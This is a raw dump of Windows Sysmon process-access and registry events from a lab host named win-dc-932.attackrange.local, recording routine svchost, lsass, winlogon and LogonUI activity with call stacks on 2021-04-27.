12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440889Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440888Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.857{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000440887Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.806{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000440886Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.806{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000001) 12241200x8000000000000000440885Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-DeleteValue2021-04-27 12:24:43.806{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1 13241300x8000000000000000440884Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.806{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000000) 13241300x8000000000000000440883Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.806{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000000) 12241200x8000000000000000440882Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-DeleteValue2021-04-27 12:24:43.806{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0 13241300x8000000000000000440881Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.755{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000440880Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.755{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000001) 12241200x8000000000000000440879Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-DeleteValue2021-04-27 12:24:43.755{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1 13241300x8000000000000000440878Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.755{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000440877Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-SetValue2021-04-27 12:24:43.755{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 12241200x8000000000000000440876Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-DeleteValue2021-04-27 12:24:43.755{42DC5269-CE8E-6086-0100-00000000BA01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1 10341000x8000000000000000440875Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.698{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440874Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.698{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440873Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.693{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000440872Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.692{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000440871Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.692{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000440870Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.691{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2f9b|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440869Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.691{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2f4d|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440868Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.691{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+5718|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440867Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.691{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+56c4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440866Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.680{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440865Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.680{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440864Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.679{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440863Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.678{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440862Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.677{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440861Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.677{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440860Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.677{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440859Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.674{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440858Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.673{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440857Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 